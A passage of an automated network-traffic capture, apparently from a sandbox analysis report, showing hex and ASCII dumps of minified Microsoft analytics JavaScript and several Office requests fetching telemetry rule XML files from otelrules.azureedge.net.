                                                                                                                                                                        2024-11-24 04:12:10 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                        Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                        2024-11-24 04:12:11 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                        Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                        2024-11-24 04:12:11 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                        Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                        2024-11-24 04:12:11 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                        Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                        2024-11-24 04:12:11 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                        Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        124192.168.2.74987213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:11 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:11 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1391
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                        x-ms-request-id: 23c3770b-601e-0084-293a-3c6b3f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041211Z-178bfbc474bv7whqhC1NYC1fg400000005k00000000001tq
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:11 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        125192.168.2.74987313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:11 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:11 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1354
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                        x-ms-request-id: c06a529d-f01e-0085-0e9a-3b88ea000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041211Z-15b8b599d885ffrhhC1TEBtuv000000003y000000000e1ca
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:11 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        126192.168.2.74987913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:11 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:11 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                        x-ms-request-id: 2537c9bf-601e-0050-536a-3c2c9c000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041211Z-174c587ffdf59vqchC1TEByk68000000040000000000hvxk
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:12 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        127192.168.2.74987813.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:11 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:11 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                        x-ms-request-id: 6b735921-c01e-0066-37ca-3ba1ec000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041211Z-174c587ffdfl22mzhC1TEBk40c000000042g000000009bmd
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:12 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        128192.168.2.74988513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:11 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:12 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                        x-ms-request-id: 20e9f7cf-701e-005c-216c-3bbb94000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041212Z-174c587ffdf9xbcchC1TEBxkz400000003ng00000000ruft
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:12 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        129192.168.2.74989013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:13 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:13 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                        ETag: "0x8DC582BDF497570"
                                                                                                                                                                        x-ms-request-id: 77142413-201e-000c-6b0a-3d79c4000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041213Z-15b8b599d88l2dpthC1TEBmzr000000003xg000000005uzc
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:13 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        130192.168.2.74989513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:13 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:13 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                        x-ms-request-id: 18ec886b-801e-0078-7044-3cbac6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041213Z-178bfbc474bwh9gmhC1NYCy3rs00000005e000000000f2py
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        131192.168.2.74989913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:13 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
